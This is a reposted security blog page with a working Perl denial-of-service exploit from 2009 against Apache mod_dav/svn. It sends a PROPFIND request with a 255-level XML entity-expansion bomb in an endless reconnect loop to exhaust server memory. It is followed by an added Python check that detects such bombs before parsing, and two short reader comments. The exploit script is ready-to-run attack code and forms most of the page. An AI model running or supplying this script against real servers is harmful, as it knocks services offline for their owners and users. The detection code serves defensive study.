
Apache mod_dav / svn Remote Denial of Service Vulnerability

Exploiting this vulnerability exhausts all of the system's memory resources.

###furoffyourcat.pl
### Apache mod_dav / svn Remote Denial of Service Exploit
### by kcope / June 2009
###
### Will exhaust all system memory
### Needs Authentication on normal DAV
###
### This can be especially serious stuff when used against
### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl furoffyourcat.pl <remotehost> <webdav folder> [username] [password]\n";
    print "example: perl furoffyourcat.pl svn.XXX.com /projects/\n";exit;
}

if ($#ARGV < 1) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];

$username = $ARGV[2];
$password = $ARGV[3];
                            
$|=1;

$BasicAuth = encode_base64("$username:$password");
chomp $BasicAuth;

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp');
print $sock "PROPFIND $webdavfile HTTP/1.1\r\n";
print $sock "Host: $hostname\r\n";
print $sock "Depth: 0\r\n";
print $sock "Connection: close\r\n";
if ($username ne "") {
print $sock "Authorization: Basic $BasicAuth\r\n";    
}
print $sock "\r\n";
$x = <$sock>;    

print $x;
if (!($x =~ /207/)) {
while(<$sock>) {
    print;    
}
close($sock);
print "No PROPFIND on this server and path.\n";
exit(0);    
}

$a = "";
for ($i=1;$i<256;$i++) {        # Here you can increase the XML bomb count
    $k = $i-1;
    $a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}

$igzml =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ELEMENT REMOTE ANY>\n"
."<!ENTITY x0 \"foobar\">\n"
.$a
."]>\n"
."<REMOTE>\n"
."&x$k;\n"
."</REMOTE>\n";

print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
print "by kcope in 2009\n";
print "Launching DoS Attack…\n";

$ExploitRequest =
"PROPFIND $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n"
."Depth: 0\r\n";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";    
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($igzml)."\r\n\r\n" . $igzml;

while(1) {
again:
my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => 80,
                              Proto    => 'tcp') || (goto again);

print $sock $ExploitRequest;
print ";Pp";
}

# milw0rm.com [2009-06-01]
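
The script's DTD declares entities that each reference the previous one twice, so the last entity's expanded size doubles with every level. The following is an added example, not part of the original post or script: a pre-parse check that computes each entity's expanded length arithmetically and rejects a request body before it reaches the XML parser. The function names, the 1,000,000-character limit and the sample bodies are assumptions made for the illustration.

```python
import re

# Internal general entity declarations only: <!ENTITY name "value">.
# Parameter (%) and external (SYSTEM/PUBLIC) entities are out of scope here.
ENTITY_DECL = re.compile(r'<!ENTITY\s+([\w.:-]+)\s+(["\'])(.*?)\2\s*>', re.S)
ENTITY_REF = re.compile(r'&([\w.:-]+);')

def expanded_lengths(xml_text):
    """Map each declared entity to its fully expanded length, computed
    arithmetically so that nothing is ever expanded in memory."""
    decls = {}
    for name, _quote, value in ENTITY_DECL.findall(xml_text):
        decls.setdefault(name, value)      # XML: the first declaration wins
    sizes, on_path = {}, set()
    for root in decls:
        stack = [root]                     # explicit stack, no recursion limit
        while stack:
            name = stack[-1]
            if name in sizes:
                stack.pop()
                continue
            refs = [r for r in ENTITY_REF.findall(decls[name]) if r in decls]
            pending = {r for r in refs if r not in sizes}
            if pending:
                if name in on_path:        # reached again while unresolved
                    raise ValueError(f"entity {name!r} refers to itself")
                on_path.add(name)
                stack.extend(pending)
            else:
                literal = len(ENTITY_REF.sub("", decls[name]))
                sizes[name] = literal + sum(sizes[r] for r in refs)
                stack.pop()
    return sizes

def exceeds_expansion_limit(xml_text, limit=1_000_000):
    """True if the body should be rejected (limit is an assumed policy value)."""
    try:
        return any(n > limit for n in expanded_lengths(xml_text).values())
    except ValueError:
        return True                        # self-referencing entities: reject

def constructed_body(levels):
    # Constructed sample with the same DTD shape as the script above.
    decls = "".join(f'<!ENTITY x{i} "&x{i-1};&x{i-1};">\n'
                    for i in range(1, levels + 1))
    return ('<?xml version="1.0"?>\n<!DOCTYPE REMOTE [\n'
            f'<!ENTITY x0 "foobar">\n{decls}]>\n<REMOTE>&x{levels};</REMOTE>\n')
```

With the 255 levels used in the script, the check reports an expanded length of 6 × 2^255 characters for the last entity without allocating it.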

Please respect copyright when reposting. Source: 秋天博客
Permalink: https://www.cfresh.net/web-security/180

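  1. 0point
    0point June 12th, 2009 @ 16:23 | #-31

    Exhausting memory brings the server down, so doesn't that achieve the goal of denial of service? Heh.

  2. 海天无影
    海天无影 June 12th, 2009 @ 13:06 | #-32

    Speechless. All this just to exhaust memory?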
